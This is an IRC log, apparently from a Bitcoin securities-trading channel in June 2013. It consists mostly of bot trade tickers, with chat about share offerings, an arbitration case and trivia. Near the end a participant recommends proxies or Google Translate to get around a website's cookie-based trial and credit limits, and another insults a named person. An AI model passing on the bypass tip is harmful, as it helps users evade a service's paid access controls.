@ 0.000751 = 0.0586 BTC [+] Jun 07 17:46:14 [BTCTC] [BITVPS] 23 @ 0.000752 = 0.0173 BTC [+] Jun 07 17:46:14 [BTCTC] [BITVPS] 399 @ 0.000754 = 0.3008 BTC [+] Jun 07 17:46:16 [BTCTC] [BITVPS] 4 @ 0.000754 = 0.003 BTC [+] Jun 07 17:46:33 [BTCTC] [S.MPOE-PT] 4 @ 0.000726 = 0.0029 BTC [+] Jun 07 17:46:39 [BTCTC] [ASICMINER-PT] 2 @ 2.496 = 4.992 BTC [-] Jun 07 17:47:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.025075 = 0.1254 BTC [-] Jun 07 17:51:33 [MPEX] [S.MPOE] 6352 @ 0.00072648 = 4.6146 BTC [+] Jun 07 17:51:44 [DIVIDEND PAID] [TAT.VIRTUALMINE] 115,000 @ .00003223 Jun 07 17:51:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.025075 BTC [-] Jun 07 17:53:25 fyi i am traveling and will be less available for a few days. Jun 07 17:54:14 [BTCTC] [TAT.ASICMINER] 22 @ 0.025 = 0.55 BTC [-] Jun 07 17:54:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.024999 = 0.25 BTC [-] Jun 07 17:55:30 [BTCTC] [TAT.ASICMINER] 14 @ 0.024999 = 0.35 BTC [-] Jun 07 17:55:33 [BTCTC] [TAT.ASICMINER] 22 @ 0.024998 = 0.55 BTC [-] Jun 07 17:55:51 is there a btc transactions stream? Jun 07 17:56:15 [HAVELOCK] [ASICM] 25 @ 0.0253 = 0.6325 BTC [-] Jun 07 17:56:44 [HAVELOCK] [ASICM] 409 @ 0.0253 = 10.3477 BTC [-] Jun 07 17:57:18 [HAVELOCK] [ASICM] 25 @ 0.0253 = 0.6325 BTC [-] Jun 07 17:58:04 [HAVELOCK] [ASICM] 1317 @ 0.0253 = 33.3201 BTC [-] Jun 07 18:00:11 b0n1 theres a bitcoin-market channel with streaming price data if that's what you mean. Jun 07 18:00:53 [BTCTC] [ASICMINER-PT] 5 @ 2.495 = 12.475 BTC [-] Jun 07 18:01:59 [BTCTC] [ASICMINER-PT] 1 @ 2.496 BTC [+] Jun 07 18:02:57 no i mean transactions, not trades Jun 07 18:03:12 [HAVELOCK] [ASICM] 4 @ 0.025299 = 0.1012 BTC [-] Jun 07 18:03:49 :/ Jun 07 18:06:01 ;;asks 112.5 Jun 07 18:06:07 There are currently 3268.261 bitcoins offered at or under 112.5 USD, worth 367208.243648 USD in total. | Data vintage: 0.0154 seconds Jun 07 18:20:12 [HAVELOCK] [ASICM] 34 @ 0.025299 = 0.8602 BTC [-] Jun 07 18:20:28 [HAVELOCK] [ASICM] 29 @ 0.025299 = 0.7337 BTC [-] Jun 07 18:21:35 b0n1: go to #bitcoin-market it scrolls txns from all exchanges Jun 07 18:21:44 oh, nm Jun 07 18:21:48 just read the rest Jun 07 18:22:01 b0n1: go to blockchain.info? Jun 07 18:22:04 they stream txns Jun 07 18:22:07 bottom left Jun 07 18:28:49 [BTCTC] [ASICMINER-PT] 2 @ 2.49 = 4.98 BTC [-] Jun 07 18:35:10 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [-] Jun 07 18:35:13 [BTCTC] [ASICMINER-PT] 1 @ 2.4662 BTC [-] Jun 07 18:35:15 [BTCTC] [ASICMINER-PT] 1 @ 2.4661 BTC [-] Jun 07 18:35:19 [BTCTC] [ASICMINER-PT] 1 @ 2.465 BTC [-] Jun 07 18:35:21 [BTCTC] [ASICMINER-PT] 1 @ 2.46412 BTC [-] Jun 07 18:35:23 [BTCTC] [ASICMINER-PT] 2 @ 2.46411 = 4.9282 BTC [-] Jun 07 18:35:24 [BTCTC] [ASICMINER-PT] 1 @ 2.462 BTC [-] Jun 07 18:35:26 [BTCTC] [ASICMINER-PT] 1 @ 2.461 BTC [-] Jun 07 18:35:30 [BTCTC] [ASICMINER-PT] 1 @ 2.461 BTC [-] Jun 07 18:35:32 [BTCTC] [ASICMINER-PT] 1 @ 2.4604 BTC [-] Jun 07 18:35:35 [BTCTC] [ASICMINER-PT] 2 @ 2.4603 = 4.9206 BTC [-] Jun 07 18:35:38 [BTCTC] [ASICMINER-PT] 2 @ 2.4602 = 4.9204 BTC [-] Jun 07 18:35:40 [BTCTC] [ASICMINER-PT] 8 @ 2.46 = 19.68 BTC [-] Jun 07 18:35:42 [BTCTC] [ASICMINER-PT] 2 @ 2.46 = 4.92 BTC [-] Jun 07 18:45:50 http://www.theblaze.com/stories/2013/06/07/be-aware-car-thieves-are-using-some-kind-of-universal-car-remote-and-cops-are-stumped/ Jun 07 18:49:25 [BTCTC] [BITVPS] 25 @ 0.000734 = 0.0184 BTC [-] Jun 07 18:49:26 [BTCTC] [BITVPS] 10 @ 0.000734 = 0.0073 BTC [-] Jun 07 18:49:40 [BTCTC] [BITVPS] 40 @ 0.00073 = 0.0292 BTC [-] Jun 07 18:54:34 [BTCTC] [ASICMINER-PT] 1 @ 2.493 BTC [+] Jun 07 18:58:14 [BTCTC] [TAT.ASICMINER] 6 @ 0.02491 = 0.1495 BTC [-] Jun 07 18:58:49 [BTCTC] [TAT.ASICMINER] 15 @ 0.0249 = 0.3735 BTC [-] Jun 07 19:00:00 [BTCTC] [ASICMINER-PT] 2 @ 2.48 = 4.96 BTC [-] Jun 07 19:01:12 [BTCTC] [ASICMINER-PT] 20 @ 2.49 = 49.8 BTC [+] Jun 07 19:07:41 [HAVELOCK] [HIM] 12 @ 0.3054 = 3.6648 BTC [+] Jun 07 19:09:13 [BTCTC] [TAT.ASICMINER] 7 @ 0.0249 = 0.1743 BTC [-] Jun 07 19:11:51 [BTCTC] [ASICMINER-PT] 3 @ 2.49 = 7.47 BTC [+] Jun 07 19:12:47 [BTCTC] [ASICMINER-PT] 6 @ 2.49 = 14.94 BTC [+] Jun 07 19:14:06 [HAVELOCK] [ASICM] 71 @ 0.02529999 = 1.7963 BTC [+] Jun 07 19:14:16 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] Jun 07 19:14:25 [HAVELOCK] [ASICM] 25 @ 0.0253 = 0.6325 BTC [+] Jun 07 19:14:54 [HAVELOCK] [ASICM] 37 @ 0.02539 = 0.9394 BTC [+] Jun 07 19:16:05 [HAVELOCK] [ASICM] 27 @ 0.02549 = 0.6882 BTC [+] Jun 07 19:17:48 [BTCTC] [ASICMINER-PT] 2 @ 2.49 = 4.98 BTC [+] Jun 07 19:20:07 [BTCTC] [ASICMINER-PT] 8 @ 2.49294 = 19.9435 BTC [+] Jun 07 19:20:44 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Jun 07 19:21:58 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Jun 07 19:23:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.0249 = 0.0498 BTC [-] Jun 07 19:24:27 [BTCTC] [TAT.ASICMINER] 24 @ 0.02489 = 0.5974 BTC [-] Jun 07 19:26:55 [BTCTC] [ASICMINER-PT] 2 @ 2.470001 = 4.94 BTC [+] Jun 07 19:27:37 [BTCTC] [TAT.ASICMINER] 12 @ 0.024871 = 0.2985 BTC [-] Jun 07 19:27:52 [BTCTC] [TAT.ASICMINER] 50 @ 0.02487 = 1.2435 BTC [-] Jun 07 19:28:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.024831 = 0.0497 BTC [-] Jun 07 19:28:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.02481 BTC [-] Jun 07 19:28:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.02481 = 0.0496 BTC [-] Jun 07 19:28:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.024802 = 0.248 BTC [-] Jun 07 19:28:30 [BTCTC] [TAT.ASICMINER] 25 @ 0.024801 = 0.62 BTC [-] Jun 07 19:30:20 [BTCTC] [TAT.ASICMINER] 57 @ 0.024801 = 1.4137 BTC [-] Jun 07 19:36:41 [BTCTC] [ASICMINER-PT] 1 @ 2.469 BTC [-] Jun 07 19:36:57 [BTCTC] [ASICMINER-PT] 1 @ 2.4683 BTC [-] Jun 07 19:37:07 [BTCTC] [TAT.ASICMINER] 16 @ 0.024801 = 0.3968 BTC [-] Jun 07 19:37:18 [BTCTC] [B.YABMC] 4 @ 0.013 = 0.052 BTC [-] Jun 07 19:37:21 [BTCTC] [B.YABMC] 6 @ 0.013 = 0.078 BTC [-] Jun 07 19:38:00 [BTCTC] [ASICMINER-PT] 1 @ 2.4899 BTC [+] Jun 07 19:38:10 [BTCTC] [ASICMINER-PT] 1 @ 2.492 BTC [+] Jun 07 19:38:46 [BTCTC] [ASICMINER-PT] 1 @ 2.4683 BTC [-] Jun 07 19:54:01 [BTCTC] [TAT.ASICMINER] 14 @ 0.0249 = 0.3486 BTC [+] Jun 07 19:56:53 [BTCTC] [S.BBET-PT] 1 @ 0.00204 BTC [+] Jun 07 20:03:27 [HAVELOCK] [ASICM] 1 @ 0.02500002 BTC [-] Jun 07 20:04:51 [HAVELOCK] [ASICM] 51 @ 0.025 = 1.275 BTC [-] Jun 07 20:04:52 [HAVELOCK] [ASICM] 64 @ 0.025 = 1.6 BTC [-] Jun 07 20:07:41 [BTCTC] [TAT.ASICMINER] 7 @ 0.0249 = 0.1743 BTC [+] Jun 07 20:08:04 ;;ticker Jun 07 20:08:04 BTCUSD ticker | Best bid: 107.94262, Best ask: 107.98000, Bid-ask spread: 0.03738, Last trade: 107.98000, 24 hour volume: 66218.80992109, 24 hour low: 106.15000, 24 hour high: 121.12999, 24 hour vwap: 113.72829 Jun 07 20:08:16 [HAVELOCK] [ASICM] 100 @ 0.02489 = 2.489 BTC [-] Jun 07 20:11:25 [HAVELOCK] [ASICM] 5 @ 0.0249 = 0.1245 BTC [+] Jun 07 20:12:09 [HAVELOCK] [ASICM] 13 @ 0.02489 = 0.3236 BTC [-] Jun 07 20:12:10 [HAVELOCK] [ASICM] 36 @ 0.02482 = 0.8935 BTC [-] Jun 07 20:12:11 [HAVELOCK] [ASICM] 23 @ 0.02481002 = 0.5706 BTC [-] Jun 07 20:12:12 [HAVELOCK] [ASICM] 17 @ 0.0248 = 0.4216 BTC [-] Jun 07 20:12:13 [HAVELOCK] [ASICM] 83 @ 0.02463 = 2.0443 BTC [-] Jun 07 20:12:14 [HAVELOCK] [ASICM] 100 @ 0.02462 = 2.462 BTC [-] Jun 07 20:12:15 [HAVELOCK] [ASICM] 2 @ 0.0246 = 0.0492 BTC [-] Jun 07 20:12:16 [HAVELOCK] [ASICM] 226 @ 0.0246 = 5.5596 BTC [-] Jun 07 20:12:36 [HAVELOCK] [ASICM] 24 @ 0.0246 = 0.5904 BTC [-] Jun 07 20:17:22 [HAVELOCK] [ASICM] 200 @ 0.0247 = 4.94 BTC [+] Jun 07 20:17:44 [HAVELOCK] [ASICM] 50 @ 0.0247 = 1.235 BTC [+] Jun 07 20:18:18 [HAVELOCK] [ASICM] 50 @ 0.0247 = 1.235 BTC [+] Jun 07 20:19:38 [BTCTC] [TAT.ASICMINER] 74 @ 0.02505 = 1.8537 BTC [+] Jun 07 20:37:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.025 = 0.125 BTC [-] Jun 07 20:37:48 [BTCTC] [TAT.ASICMINER] 7 @ 0.02505 = 0.1754 BTC [+] Jun 07 20:40:38 [BTCTC] [S.DICE-PT] 10 @ 0.002699 = 0.027 BTC [+] Jun 07 20:51:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.025049 = 0.2505 BTC [-] Jun 07 20:53:31 [BTCTC] [ASICMINER-PT] 2 @ 2.48 = 4.96 BTC [+] Jun 07 20:57:43 [HAVELOCK] [ASICM] 30 @ 0.02471 = 0.7413 BTC [+] Jun 07 20:57:45 [HAVELOCK] [ASICM] 14 @ 0.0247 = 0.3458 BTC [-] Jun 07 20:57:51 [HAVELOCK] [ASICM] 1 @ 0.0246001 BTC [-] Jun 07 20:59:06 [HAVELOCK] [VTX] 32 @ 0.425 = 13.6 BTC [+] Jun 07 21:01:11 [HAVELOCK] [ASICM] 39 @ 0.0246001 = 0.9594 BTC [-] Jun 07 21:02:04 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Jun 07 21:03:44 [HAVELOCK] [ASICM] 61 @ 0.0246 = 1.5006 BTC [-] Jun 07 21:05:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.025049 = 0.2505 BTC [-] Jun 07 21:10:40 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Jun 07 21:15:14 [HAVELOCK] [ASICM] 3 @ 0.0249 = 0.0747 BTC [+] Jun 07 21:15:41 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Jun 07 21:24:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.025049 = 0.0501 BTC [-] Jun 07 21:24:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.02505 = 0.0501 BTC [+] Jun 07 21:25:20 [BTCTC] [TAT.ASICMINER] 9 @ 0.025074 = 0.2257 BTC [+] Jun 07 21:29:44 [BTCTC] [TAT.ASICMINER] 85 @ 0.025074 = 2.1313 BTC [+] Jun 07 21:32:35 [BTCTC] [BASIC-MINING] 1 @ 0.678203 BTC [+] Jun 07 21:32:36 [BTCTC] [BASIC-MINING] 1 @ 0.678204 BTC [+] Jun 07 21:32:38 [BTCTC] [BASIC-MINING] 1 @ 0.67823 BTC [+] Jun 07 21:37:35 [BTCTC] [TAT.ASICMINER] 6 @ 0.025074 = 0.1504 BTC [+] Jun 07 21:40:28 [BTCTC] [S.DICE-PT] 10 @ 0.0027 = 0.027 BTC [+] Jun 07 21:40:30 [BTCTC] [S.DICE-PT] 140 @ 0.002725 = 0.3815 BTC [+] Jun 07 21:41:13 [BTCTC] [S.BBET-PT] 60 @ 0.00205 = 0.123 BTC [+] Jun 07 21:42:09 [MPEX] [S.MG] 29000 @ 0.00010555 = 3.061 BTC [+] Jun 07 21:42:11 [MPEX] [S.MG] 20000 @ 0.00010055 = 2.011 BTC [-] Jun 07 21:42:13 [MPEX] [S.MG] 200000 @ 0.00010015 = 20.03 BTC [-] Jun 07 21:42:17 [MPEX] [S.MG] 68000000 @ 0.0001001 = 6806.8 BTC [-] Jun 07 21:42:23 [MPEX] [S.MG] 5000 @ 0.00010001 = 0.5001 BTC [-] Jun 07 21:42:25 [MPEX] [S.MG] 150000 @ 0.0001 = 15 BTC [-] Jun 07 21:42:31 [MPEX] [S.MG] 40000 @ 0.0001 = 4 BTC [-] Jun 07 21:42:39 [MPEX] [S.MG] 30000 @ 0.0001 = 3 BTC [-] Jun 07 21:42:41 [MPEX] [S.MG] 150000 @ 0.0001 = 15 BTC [-] Jun 07 21:42:49 [MPEX] [S.MG] 100000 @ 0.0001 = 10 BTC [-] Jun 07 21:42:54 [MPEX] [S.MG] 1000 @ 0.0001 = 0.1 BTC [-] Jun 07 21:42:56 [MPEX] [S.MG] 30000 @ 0.0001 = 3 BTC [-] Jun 07 21:43:43 !t m s.mg Jun 07 21:43:44 [MPEX:S.MG] 1D: 0.0001 / 0.0001001 / 0.00010555 (68755000 shares, 6,882.50 BTC), 7D: 0.0001 / 0.00010008 / 0.00010555 (82086555 shares, 8,215.67 BTC), 30D: 0.0001 / 0.00010008 / 0.00010555 (82086555 shares, 8,215.67 BTC) Jun 07 21:44:08 mkay, that was the 2nd batch. last one monday, about 18mn shares left out of the 100mn max. Jun 07 21:53:14 ;;bc,stats Jun 07 21:53:17 Current Blocks: 240282 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 1637 blocks | Next Difficulty In About: 1 week, 2 days, 22 hours, 6 minutes, and 32 seconds | Next Difficulty Estimate: 18802497.6154 | Estimated Percent Change: 20.48533 Jun 07 21:57:11 [HAVELOCK] [ASICM] 22 @ 0.025 = 0.55 BTC [+] Jun 07 22:01:07 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Jun 07 22:04:12 [BTCTC] [ASICMINER-PT] 1 @ 2.469 BTC [-] Jun 07 22:04:15 [BTCTC] [ASICMINER-PT] 1 @ 2.4685 BTC [-] Jun 07 22:04:18 [BTCTC] [ASICMINER-PT] 1 @ 2.46811 BTC [-] Jun 07 22:05:45 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Jun 07 22:09:38 mp, I'd get in with at least a few BTC, but I'll have to wait for the PTs :-) I don't really have time to research the asset either, sadly. Jun 07 22:12:33 furuknap: no love for coinbr? Jun 07 22:12:55 it wasn't even mentioned in your report and my comment prolly still awaits moderation Jun 07 22:13:24 Nah, I hate those guys, they're all scammers and cheats trying to run off withe veryones money! Jun 07 22:13:26 :-P Jun 07 22:13:37 which guys? Jun 07 22:13:39 Actually, since you're a broker, I didn't include you. Jun 07 22:14:01 Not sure why I forgot to moedrate the comment. I'll get it out now. Jun 07 22:15:31 http://coin.furuknap.net/where-to-buy-bitcoin-and-litecoin-shares/#comment-299 Jun 07 22:16:35 oh, you forgot to mention "they're all scammers and cheats..." there Jun 07 22:16:40 but thanks anyway :D Jun 07 22:16:51 I'll add it as a follow-up comment if I remember :-) Jun 07 22:17:02 [MPEX] [O.USD.P131T] 1 @ 0.67433933 BTC Jun 07 22:17:19 oh, options ceasefire broken Jun 07 22:18:38 [MPEX] [O.USD.P101T] 2 @ 0.35741442 = 0.7148 BTC [-] Jun 07 22:18:50 lol Jun 07 22:22:02 Interesting factoid of the day.The $-sign is largely believed to be a merger between P and s that initially stood for Pounds (as in British pounds). Jun 07 22:22:09 oh hey, options action Jun 07 22:23:11 [BTCTC] [COGNITIVE] 1 @ 0.284952 BTC [+] Jun 07 22:23:12 [BTCTC] [COGNITIVE] 1 @ 0.284952 BTC [+] Jun 07 22:23:55 [BTCTC] [TAT.ASICMINER] 25 @ 0.025075 = 0.6269 BTC [+] Jun 07 22:24:45 The name dollar derives from Thaler, which means valley, and comes from the fact that the first thalers were made in Joachimsthal (Joachim's valley) i the Checz republic back in the late 1500s. Jun 07 22:27:36 furuknap: i suspect something misspelled there Jun 07 22:28:14 Czech republic? Jun 07 22:29:00 That's why I have a very skilled copy editor for my professional writing :-) Jun 07 22:29:01 okay, but such thing did not exist then, either Jun 07 22:29:15 ? Jun 07 22:29:18 it was Bohemian land of Holy Roman Empire by that time Jun 07 22:29:53 Yeah, and stricly speaking, the name is now Jáchymov, not Joachims valley, but let's not be pedantic, shall we? Jun 07 22:29:59 or maybe Austria, not sure. Jun 07 22:30:46 And now that I look it up, it was early 1500, not late. Jun 07 22:30:58 Geez, some people are never satisfied with random useless facts of the day. Jun 07 22:31:01 :-) Jun 07 22:33:18 well, no wonder if you place in in misspelled country that will not exist for next 480 years after the fact Jun 07 22:33:32 actually, the best way one could use his bitcoin time is researching my concoctions. Jun 07 22:33:36 now that's a factoid. Jun 07 22:37:45 mircea_popescu: you mean something like https://bitcointalk.org/index.php?topic=128397.msg2403269#msg2403269 ? Jun 07 22:38:52 [HAVELOCK] [ASICM] 34 @ 0.025 = 0.85 BTC [+] Jun 07 22:39:30 lol Jun 07 22:39:47 well i meant the mg thing, but i guess that worx Jun 07 22:40:11 wences https://bitcointalk.org/index.php?topic=128397.msg2403269#msg2403269 << the plot thickens Jun 07 22:40:32 but actually, the rota case is when we met. Jun 07 22:40:46 what is there to research about s.mg? is something alredy in development? to be delivered in 2 weeks? Jun 07 22:41:18 just reading the contract is a good start. Jun 07 22:41:30 figuring out wtf ssws are and how they're likely to work is a good 2nd step Jun 07 22:41:50 and mind youi, i just mean the research angle, not doing anything useful, just educating oneself. Jun 07 22:42:15 :) Jun 07 22:43:07 Conspiracy theories are the resource of the lame; they do not demand research, thought or proof and you can "prove" anything with them Jun 07 22:43:43 indeed. fiction without good writing. Jun 07 22:43:51 the man is actually online :o Jun 07 22:44:04 must be same person or smth! Jun 07 22:44:04 always Jun 07 22:44:18 kakobrekla it's really mpoe-pr. Jun 07 22:44:22 :D Jun 07 22:44:35 wences is a very common name here in mongolia... Jun 07 22:44:39 ahahaha Jun 07 22:44:40 we all are. half of #bitcoin-assets is mpoe-pr Jun 07 22:44:41 lmao Jun 07 22:49:19 [HAVELOCK] [ASICM] 966 @ 0.025 = 24.15 BTC [+] Jun 07 22:49:25 [HAVELOCK] [ASICM] 34 @ 0.02490001 = 0.8466 BTC [-] Jun 07 22:52:01 [MPEX] [S.MPOE] 4100 @ 0.00072648 = 2.9786 BTC [+] Jun 07 22:53:08 he mircea_popescu did you get my link? Jun 07 22:55:27 take dat as no Jun 07 22:56:06 [HAVELOCK] [ASICM] 1 @ 0.0249 BTC [-] Jun 07 22:56:07 [HAVELOCK] [ASICM] 1 @ 0.0248 BTC [-] Jun 07 22:56:09 [HAVELOCK] [ASICM] 1 @ 0.0247 BTC [-] Jun 07 22:56:10 [HAVELOCK] [ASICM] 3 @ 0.02465501 = 0.074 BTC [-] Jun 07 22:57:52 i just linked s.mg announcement to local coworker/hacker community.. I hope the trilema article is not too dense for the kids Jun 07 22:58:00 [BTCTC] [PAJKA.BOND] 1 @ 0.08 BTC [-] Jun 07 22:58:24 I hope S.MG doesn't go in the direction of Zynga. lol Jun 07 23:00:32 [BTCTC] [TAT.ASICMINER] 30 @ 0.025066 = 0.752 BTC [-] Jun 07 23:00:37 [BTCTC] [TAT.ASICMINER] 21 @ 0.025066 = 0.5264 BTC [-] Jun 07 23:00:40 [BTCTC] [PAJKA.BOND] 1 @ 0.089631 BTC [+] Jun 07 23:05:09 "In the middle with the beard is MPOE-PR.". rly? Jun 07 23:07:39 yes. next day s/he shaved and got these red clothes Jun 07 23:07:56 the change was amazing Jun 07 23:08:49 Reminds me of a bash.org quote :-) Jun 07 23:09:28 http://bash.org/?126273 Jun 07 23:12:04 lol the wences conspiracy got another twist: https://bitcointalk.org/index.php?topic=128397.msg2404921#msg2404921 Jun 07 23:16:49 [HAVELOCK] [HIM] 25 @ 0.3 = 7.5 BTC [-] Jun 07 23:18:51 [MPEX] [S.MPOE] 113 @ 0.00072648 = 0.0821 BTC [+] Jun 07 23:18:52 [MPEX] [S.MPOE] 4321 @ 0.00072634 = 3.1385 BTC [-] Jun 07 23:19:00 [HAVELOCK] [ASICM] 34 @ 0.02465501 = 0.8383 BTC [-] Jun 07 23:19:01 [MPEX] [S.MPOE] 10816 @ 0.00072633 = 7.856 BTC [-] Jun 07 23:22:04 kinda. but actually the judgment was fair except for how 5btc fee was divided Jun 07 23:23:07 judge jcpham thought mp was pushing the case to rota without trying enough to settle otherwise and judged thus Jun 07 23:24:03 and he second judge of the three agreed too, pissing mp off Jun 07 23:24:30 *the Jun 07 23:25:20 [BTCTC] [PAJKA.BOND] 6 @ 0.073001 = 0.438 BTC [-] Jun 07 23:25:22 [BTCTC] [PAJKA.BOND] 10 @ 0.073 = 0.73 BTC [-] Jun 07 23:25:24 [BTCTC] [PAJKA.BOND] 3 @ 0.0721 = 0.2163 BTC [-] Jun 07 23:25:26 [BTCTC] [PAJKA.BOND] 1 @ 0.072 BTC [-] Jun 07 23:25:30 [BTCTC] [PAJKA.BOND] 1 @ 0.072 BTC [-] Jun 07 23:25:31 [BTCTC] [PAJKA.BOND] 15 @ 0.07 = 1.05 BTC [-] Jun 07 23:25:33 [BTCTC] [PAJKA.BOND] 4 @ 0.061 = 0.244 BTC [-] Jun 07 23:25:34 [BTCTC] [PAJKA.BOND] 4 @ 0.0605 = 0.242 BTC [-] Jun 07 23:25:35 [BTCTC] [PAJKA.BOND] 16 @ 0.06 = 0.96 BTC [-] Jun 07 23:29:12 TheSeven which ? Jun 07 23:29:15 oops Jun 07 23:29:18 thestringpuller which ? Jun 07 23:29:48 furuknap knows bash.org by heart wtf Jun 07 23:30:06 I've spent so much time there you wouldn't know... Jun 07 23:30:31 Hah, the kid sold off his last PAJKA. I bet that hurt more than he'd like to admit. Jun 07 23:31:20 jurov kinda funny that glon character. Jun 07 23:31:30 btc went from y to z address thus therefore owner of y owns z too. Jun 07 23:31:42 i guess half teh interwebs owns 1dice* Jun 07 23:32:15 TheSeven i know, my bad ;/ 4char isn't good enough to tab who knew. Jun 07 23:37:47 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Jun 07 23:37:49 [BTCTC] [ASICMINER-PT] 9 @ 2.47 = 22.23 BTC [-] Jun 07 23:38:56 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Jun 07 23:39:06 [BTCTC] [ASICMINER-PT] 4 @ 2.46813 = 9.8725 BTC [-] Jun 07 23:39:10 [BTCTC] [ASICMINER-PT] 1 @ 2.46812 BTC [-] Jun 07 23:49:34 looks like S.MG might IPO max share amount Jun 07 23:50:08 [BTCTC] [BASIC-MINING] 1 @ 0.678678 BTC [+] Jun 07 23:50:30 [BTCTC] [BASIC-MINING] 3 @ 0.678678 = 2.036 BTC [+] Jun 07 23:50:32 [BTCTC] [BASIC-MINING] 10 @ 0.6789 = 6.789 BTC [+] Jun 07 23:50:34 [BTCTC] [BASIC-MINING] 2 @ 0.679 = 1.358 BTC [+] Jun 07 23:50:36 [BTCTC] [BASIC-MINING] 1 @ 0.68 BTC [+] Jun 07 23:50:38 [BTCTC] [BASIC-MINING] 2 @ 0.68 = 1.36 BTC [+] Jun 07 23:50:46 [BTCTC] [BASIC-MINING] 2 @ 0.6899 = 1.3798 BTC [+] Jun 07 23:50:55 [BTCTC] [BASIC-MINING] 1 @ 0.69 BTC [+] Jun 07 23:50:57 [BTCTC] [BASIC-MINING] 1 @ 0.69994 BTC [+] Jun 07 23:50:59 [BTCTC] [BASIC-MINING] 2 @ 0.7 = 1.4 BTC [+] Jun 07 23:50:59 FabianB_ kinda wow tbh. Jun 07 23:51:01 Mircea Jun 07 23:51:03 [BTCTC] [BASIC-MINING] 4 @ 0.7 = 2.8 BTC [+] Jun 07 23:51:08 wences Jun 07 23:51:22 I cleared my cookes and lost my credits on Trilema Jun 07 23:51:31 I had some credit left, right? Jun 07 23:51:33 so set the cookie up again Jun 07 23:51:36 i have no idea. Jun 07 23:51:51 [BTCTC] [BASIC-MINING] 5 @ 0.71 = 3.55 BTC [+] Jun 07 23:51:53 cookies are enabled, but I cleared the history Jun 07 23:52:05 give me some creditttttttt Jun 07 23:52:14 credits... Jun 07 23:52:25 :D Jun 07 23:52:49 wences you need to go to http://trilema.com/set-cookie.php and enter w/e code you got back when you got your credits Jun 07 23:52:50 Use hidemyass for crying out loud. Jun 07 23:53:06 thank you! Jun 07 23:53:08 furuknap you know proxies only work if somebody hasn't already used them up Jun 07 23:53:14 [BTCTC] [TAT.ASICMINER] 4 @ 0.024898 = 0.0996 BTC [-] Jun 07 23:54:13 I wouldn't know, I only used it once. It's a common trick to get past cookie based trials, though, so I'm surprised if it doesn't work with you. Jun 07 23:54:54 [BTCTC] [TAT.ASICMINER] 11 @ 0.02484 = 0.2732 BTC [-] Jun 07 23:55:02 Use google translate... they have so many different IPs... Jun 07 23:55:05 More US shooting... College in Santa Monica. Jun 07 23:56:06 [BTCTC] [TAT.ASICMINER] 11 @ 0.02483 = 0.2731 BTC [-] Jun 07 23:56:10 [BTCTC] [TAT.ASICMINER] 31 @ 0.02482 = 0.7694 BTC [-] Jun 07 23:57:43 It appear this shooting didn't do too much damage... Jun 07 23:58:00 Could have been much more worse... Jun 07 23:58:05 so lots of funds for marketing and dev of games Jun 07 23:58:34 Fabian, what exeactly? Jun 07 23:59:23 S.MG Jun 08 00:05:59 mircea_popescu: not good enough for ya? http://www.thegenesisblock.com/bitcoin-london-draws-attention-of-mainstream-finance Jun 08 00:07:17 erik is invited. but he won't prolly say anything about mpex, either. Jun 08 00:08:14 hmm, paymium ceo goes. Jun 08 00:08:30 ;;later tell davout you going to http://btclondon.com ? Jun 08 00:08:30 The operation succeeded. Jun 08 00:08:53 oic. Jun 08 00:09:06 [BTCTC] [TAT.ASICMINER] 5 @ 0.024999 = 0.125 BTC [+] Jun 08 00:09:11 [BTCTC] [TAT.ASICMINER] 35 @ 0.024999 = 0.875 BTC [+] Jun 08 00:09:36 for the past ~2 years this pattern has been repeating itself about with the frequency of the seasons Jun 08 00:09:55 huff artists start big deal whatever, the irrelevant press trumpets what a big deal it is Jun 08 00:10:18 since the names keep changing it stands to reason that the path to success is outside the realm of puffery. Jun 08 00:11:12 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Jun 08 00:11:59 mircea_popescu: well Jun 08 00:11:59 (and yes, puffery is a legal term of art) Jun 08 00:12:03 to be honest Jun 08 00:12:14 if it works for them and brings in the money Jun 08 00:12:20 then why not rinse and repeat Jun 08 00:12:52 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Jun 08 00:12:54 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] Jun 08 00:12:56 [BTCTC] [ASICMINER-PT] 2 @ 2.49 = 4.98 BTC [+] Jun 08 00:13:01 [MPEX] [S.MPOE] 5100 @ 0.00072702 = 3.7078 BTC [+] Jun 08 00:13:04 because then you end up with a broken reputation and that's the end of you. Jun 08 00:13:07 [MPEX] [S.MPOE] 1940 @ 0.00072733 = 1.411 BTC [+] Jun 08 00:13:09 [MPEX] [S.MPOE] 3334 @ 0.00072828 = 2.4281 BTC [+] Jun 08 00:13:14 you get to hang out on the edges and steam, like kenna, like strateman Jun 08 00:13:25 likethe entire endless list of people. it's sort of like bitcoin's hell. Jun 08 00:14:10 i mean sure, if you're a welfare bum like taaki broken reputation might not mean anything when a few k's are on the table. i get it. Jun 08 00:14:24 [BTCTC] [ASICMINER-PT] 2 @ 2.49 = 4.98 BTC [+] Jun 08 00:14:25 but the people worth the mention in this world don't have the problem of how to buy shoes. Jun 08 00:14:51 [BTCTC] [TAT.ASICMINER] 26 @ 0.025 = 0.65 BTC [+] Jun 08 00:14:53 [BTCTC] 